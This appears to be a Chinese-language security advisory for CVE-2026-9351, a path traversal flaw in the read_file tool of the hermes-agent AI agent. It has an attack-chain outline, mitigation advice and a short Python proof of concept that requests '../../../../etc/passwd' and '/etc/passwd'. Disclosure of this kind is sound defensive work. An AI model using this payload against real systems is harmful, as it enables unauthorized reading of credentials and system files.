IPBUF安全漏洞报告
English
CVE-2026-9351 CVSS 6.5 中危

CVE-2026-9351: NousResearch hermes-agent路径遍历漏洞

披露日期: 2026-05-24

漏洞信息

漏洞编号
CVE-2026-9351
漏洞类型
路径遍历(Path Traversal)
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
NousResearch hermes-agent

相关标签

路径遍历NousResearch hermes-agentread_file工具文件读取漏洞CVE-2026-9351安全漏洞

漏洞概述

CVE-2026-9351是影响NousResearch hermes-agent的路径遍历安全漏洞,存在于tools/file_tools.py文件中的read_file工具组件中。该漏洞源于_is_blocked_device函数未能正确验证和过滤用户提供的文件路径,导致攻击者可以通过构造特殊的路径字符串(如使用../或绝对路径)绕过安全限制,访问服务器上的任意文件。漏洞影响截至2026年4月16日的所有版本。由于攻击复杂度较低且无需认证即可远程利用,攻击者可能借此读取敏感配置文件、密钥、凭据或其他系统文件,对系统安全造成威胁。厂商在收到漏洞报告后未做出任何回应,漏洞利用代码已被公开披露。

技术细节

该路径遍历漏洞位于hermes-agent的read_file工具实现中,具体在tools/file_tools.py的_is_blocked_device函数。攻击者通过构造包含路径遍历序列(如../../)或绝对路径的文件路径参数,可以绕过该函数的路径验证逻辑。当read_file工具接收到恶意构造的路径请求时,_is_blocked_device函数的检查机制无法有效阻止对受限路径的访问,导致攻击者能够读取服务器上的任意文件。CVSS 3.1评分6.5(中等),攻击向量为网络层面,攻击复杂度低,无需认证和用户交互。机密性和完整性影响均为低级别,但攻击者仍可能利用此漏洞进行信息收集,为进一步攻击做准备。

攻击链分析

STEP 1
步骤1
攻击者识别目标系统运行NousResearch hermes-agent服务
STEP 2
步骤2
攻击者发现read_file工具接口,该工具调用tools/file_tools.py中的_is_blocked_device函数
STEP 3
步骤3
攻击者构造包含路径遍历序列(如../../etc/passwd)的恶意文件路径参数
STEP 4
步骤4
_is_blocked_device函数未能正确验证路径,攻击者绕过安全限制
STEP 5
步骤5
read_file工具返回目标文件内容,攻击者成功读取服务器敏感文件
STEP 6
步骤6
攻击者利用获取的敏感信息(如密钥、凭据)进行进一步渗透攻击

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # CVE-2026-9351 PoC - Path Traversal in NousResearch hermes-agent # Target: NousResearch hermes-agent up to 2026.4.16 # Vulnerability: Path traversal in read_file Tool (_is_blocked_device function) target_url = "http://target-server:8000/api/read_file" # Payload to read /etc/passwd using path traversal payload = { "file_path": "../../../../etc/passwd" } response = requests.post(target_url, json=payload) print(f"Status: {response.status_code}") print(f"Content: {response.text}") # Alternative payload using absolute path bypass payload2 = { "file_path": "/etc/passwd" } response2 = requests.post(target_url, json=payload2) print(f"Status: {response2.status_code}") print(f"Content: {response2.text}")

影响范围

NousResearch hermes-agent <= 2026.4.16

防御指南

临时缓解措施
在厂商发布修复版本前,可通过配置网络访问控制限制对hermes-agent服务的访问,仅允许受信任的IP地址访问。同时可暂时禁用read_file工具组件以降低风险,并加强服务器文件系统权限管理,限制agent进程的用户权限。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表